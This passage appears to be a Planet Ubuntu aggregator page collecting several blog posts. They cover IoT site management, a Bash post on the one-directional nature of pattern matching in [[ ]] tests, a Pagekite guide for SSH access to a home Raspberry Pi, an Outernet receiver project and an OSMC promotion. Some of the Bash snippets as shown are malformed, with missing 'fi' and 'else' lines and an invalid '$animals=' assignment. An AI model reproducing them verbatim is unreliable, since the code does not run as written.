Battery and Generator Management in the Jungle – another real life deployment is with a service provider customer that operates several hundred telecommunication sites in demanding locations such as close to the coast or in deep jungles. The major requirement was to allow remote health checks of their on-site batteries as well as remote maintenance work for the diesel generators. Network uplink is unreliable and visits to the sites have to be reduced as much as possible. azeti’s automation engine gathers performance and health data from installed sensors and directly from the machinery. The operations team can now remotely discharge and charge the batteries, start and stop the generators and gain insights of the whole facility. On top of this, video cameras provide live feeds and access control eliminate the necessity for physical keys. On site visits and maintenance efforts have been tremendously reduced as periodic charging and discharging cycles increase the batteries lifetime heavily and diesel generators are started and stopped on a regular basis to ensure stable operations during times of outages. One of these outages just happened recently during a hurricane where the solution proved its solidness.

Further use cases in logistics, manufacturing, utilities and medical logistics show the variety of IoT solutions – Ubuntu Core for IoT is the layer enabling all the use cases and applications, hardware agnostic, security and easy manageability.

Learn more about azeti here.

17 April, 2017 09:00AM

David Tomaschik: Bash Extended Test & Pattern Matching

While my daily driver shell is ZSH, when I script, I tend to target Bash. I’ve found it’s the best mix of availability & feature set. (Ideally, scripts would be in pure posix shell, but then I’m missing a lot of features that would make my life easier. On the other hand, ZSH is not available everywhere, and certainly many systems do not have it installed by default.)

I’ve started trying to use the Bash “extended test command” ([[) when I write tests in bash, because it has fewer ways you can misuse it with bad quoting (the shell parses the whole test command rather than parsing it as arguments to a command) and I find the operations available easier to read. One of those operations is pattern matching of strings, which allows for stupidly simple substring tests and other conveniences. Take, for example:

$animals="bird cat dog"
if [[ $animals == *dog* ]] ; then
  echo "We have a dog!"

This is an easy way to see if an item is contained in a string.

Anyone who’s done programming or scripting is probably aware that the equality operator (i.e., test for equality) is a commutative operator. That is to say the following are equivalent:

if [[ $a == $b ]] ; then
  echo "a and b are equal."
if [[ $b == $a ]] ; then
  echo "a and b are still equal."

Seems obvious right? If a equals b, then b must equal a. So surely we can reverse our test in the first example and get the same results.

$animals="bird cat dog"
if [[ *dog* == $animals ]] ; then
  echo "We have a dog!"
  echo "No dog found."

Go ahead, give it a try, I’ll wait here.

OK, you probably didn’t even need to try it, or this would have been a particularly boring blog post. (Which isn’t to say that this one is a page turner to begin with.) Yes, it turns out that sample prints No dog found., but obviously we have a dog in our animals. If equality is commutative and the pattern matching worked in the first place, then why doesn’t this test work?

Well, it turns out that the equality test operator in bash isn’t really commutative – or more to the point, that the pattern expansion isn’t commutative. Reading the Bash Reference Manual, we discover that there’s a catch to pattern expansion:

When the ‘==’ and ‘!=’ operators are used, the string to the right of the operator is considered a pattern and matched according to the rules described below in Pattern Matching, as if the extglob shell option were enabled. The ‘=’ operator is identical to ‘==’. If the nocasematch shell option (see the description of shopt in The Shopt Builtin) is enabled, the match is performed without regard to the case of alphabetic characters. The return value is 0 if the string matches (‘==’) or does not match (‘!=’)the pattern, and 1 otherwise. Any part of the pattern may be quoted to force the quoted portion to be matched as a string.

(Emphasis mine.)

It makes sense when you think about it (I can’t begin to think how you would compare two patterns) and it is at least documented, but it wasn’t obvious to me. Until it bit me in a script – then it became painfully obvious.

Like many of these posts, writing this is intended primarily as a future reference to myself, but also in hopes it will be useful to someone else. It took me half an hour of Googling to get the right keywords to discover this documentation (I didn’t know the double bracket syntax was called the “extended test command”, which helps a lot), so hopefully it took you less time to find this post.

17 April, 2017 07:00AM

Ted Gould: SSH to RaspPi from anywhere

Probably like most of you I have a Raspberry Pi 2 sitting around not doing a lot. A project that I wanted to use mine for is setting up reliable network access to my home network when I'm away. I'm a geek, so network access for me means SSH. The problem with a lot of solutions out there is that ISPs on home networks change IPs, routers have funky port configurations, and a host of other annoyances that make setting up access unreliable. That's where Pagekite comes in.

Pagekite is a service that is based in Iceland and allows tunneling various protocols, including SSH. It gives a DNS name at one end of that tunnel and allows connecting from anywhere. They run on Open Source software and their libraries are all Open Source. They charge a small fee, which I think is reasonable, but they also provide a free trial account that I used to set this up and test it. You'll need to signup for Pagekite to get the name and secret to fill in below.

The first thing I did was setup Ubuntu core on my Pi and get it booting and configured. Using the built in configure tool it grabs my SSH keys already, so I don't need to do any additional configuration of SSH. You should always use key based login when you can. Then I SSH'd in on the local network to install and setup a small Pagekite snap I made like this:

# Install the snap
sudo snap install pagekite-ssh
# Configure the snap
snap set pagekite-ssh kitename=<your name>.pagekite.me kitesecret=<a bunch of hex>
# Restart the service to pickup the new config
sudo systemctl restart snap.pagekite-ssh.pagekite-ssh.service 
# Look at the logs to make sure there are no errors
journalctl --unit snap.pagekite-ssh.pagekite-ssh.service 

I then I configured my SSH to connect through Pagekite by editing my .ssh/config

Host *.pagekite.me
    User <U1 name> 
    IdentityFile ~/.ssh/id_launchpad
    CheckHostIP no
    ProxyCommand /bin/nc -X connect -x %h:443 %h %p

Now I can SSH into my Raspberry Pi from anywhere on the Internet! You could also install this on other boards Ubuntu core supports or anywhere snapd runs.

What is novel to me is that I now have a small low-power board that I can plug into any network, it will grab an IP address and setup a tunnel to a known address to access it. It will also update itself without me interacting with it at all. I'm considering putting one at my Dad's house as well to enable helping him with his network issues when the need arises. Make sure to only put these on networks that you have permission though!

17 April, 2017 05:00AM

Stephen Michael Kellat: Coming Up To Periscope Depth

I can say that work has not been pretty as of late. Some people have contacted me via Telegram. The secure call function works nicely provided I wear headphones with a built-in microphone so I can see the screen to read off the emojis to the other participant. When we get to April 28th I should have a clearer picture as to how bad things are going to get at work as a federal civil servant. My ability to travel to OggCamp 17 will probably be a bit more known by then.

I have not been to Europe since 1998 so it would be nice to leave the Americas again for at least a little while after having paid visits to the British Virgin Islands, American Samoa, and Canada in the intervening time. If I could somehow figure out how to engage in a "heritage quest" to Heachem in Norfolk, that would be nice too. I know we've seen Daniel Pocock touch on the mutability of citizenship on Planet Ubuntu before but, as I tell the diversity bureaucrats at work from time to time, some of my forebears met the English coming off the boat at Jamestown. If I did the hard work I could probably join Sons of the American Revolution.

So, what might I talk about at OggCamp 17 if I had the time? Right now the evaluation project, with the helpful backing of three fabulous sponsors, is continuing in limited fashion relative to Outernet. We have a rig and it is set up. The garage is the safest place to put it although I eventually want to get an uninterruptible power supply for it due to the flaky electrical service we have at times.

The hidden rig with a WiFi access point attached for signal boost

Although there was a talk at Chaos Communications Congress 33 that I have still not watched by Daniel Estévez about Outernet, it appears I am approaching things from a different angle. I'm looking at this from evaluating the content being distributed and how it is chosen. Daniel evaluated hardware.

The What's New screen seen from my cell phone's Firefox browser on Android
The tuner screen

There is still much to review. Currently I'm copying the receiver's take and putting on a Raspberry Pi in the house that is running on the internal network with lighttpd pointing at the directory so that I can view the contents. Eventually I'll figure out how to get the necessary WiFi bridging down to bring the CHIP board's miniscule hotspot signal from the detached garage into the house. Currently there is a WiFi extender right next to the CHIP so I don't have to be so close to the board to be able to pick up the hotspot signal while using my laptop.

Things remain in progress, of course.

17 April, 2017 03:10AM

April 16, 2017

hackergotchi for OSMC


Happy Easter from OSMC

We'd like to wish all of our users a Happy Easter. We hope you're enjoying a well deserved break and watching tons of TV!

Easter competition

We recently announced a competition to win a Vero 4K on our Facebook and Twitter accounts. We're happy to announce that the winner of a brand new Vero 4K is Mark S.

For those that didn't win: we've still some good news. We're offering 10% off everything in our Store (including Vero 4K), this week only. Get the best OSMC experience here.

16 April, 2017 06:45PM by Sam Nazarko